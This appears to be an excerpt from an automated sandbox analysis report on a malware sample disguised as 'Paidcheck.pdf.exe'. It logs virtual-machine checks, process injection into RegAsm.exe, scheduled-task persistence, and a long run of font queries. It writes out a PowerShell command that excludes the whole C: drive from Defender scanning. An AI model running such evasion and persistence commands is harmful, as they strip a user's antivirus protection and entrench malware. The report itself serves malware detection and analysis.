      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: Paidcheck.pdf.exeBinary or memory string: 8xtufgFL9YSJTJhKurqTEQ4KHdRlcviru4FUtiXAAUnnOXunjt4Xvipp3nhZtWVo+r+hOi0xK\7O7OCaMW+CuwwYdEahHwAey+MLxaowRjPiaPwgAMJaIMKBGk69eJN8nHBHp8XVGKcVV4PdaO0mGxG/JEAr8ITBz3fEoXnlAkKObYKN\7XyeVNLZvMCiE8ZjgMRtjomvalJwoGzov7OAgrMeTy3CqTWunb/XDcypmS73RJjnzQJxs58+cgWyiqgecHR
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
      Source: wscript.exe, 00000009.00000002.307685747.0000000000E23000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regionsShow sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 829008Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'Jump to behavior
      Source: RegAsm.exe, 0000000A.00000002.482649400.0000000002D4A000.00000004.00000001.sdmpBinary or memory string: Program Manager F
      Source: RegAsm.exe, 0000000A.00000002.485915733.0000000003212000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: RegAsm.exe, 0000000A.00000002.489937133.0000000006CBB000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: RegAsm.exe, 0000000A.00000002.488221357.00000000060BD000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.490208871.0000000006FEC000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Users\user\Desktop\Paidcheck.pdf.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
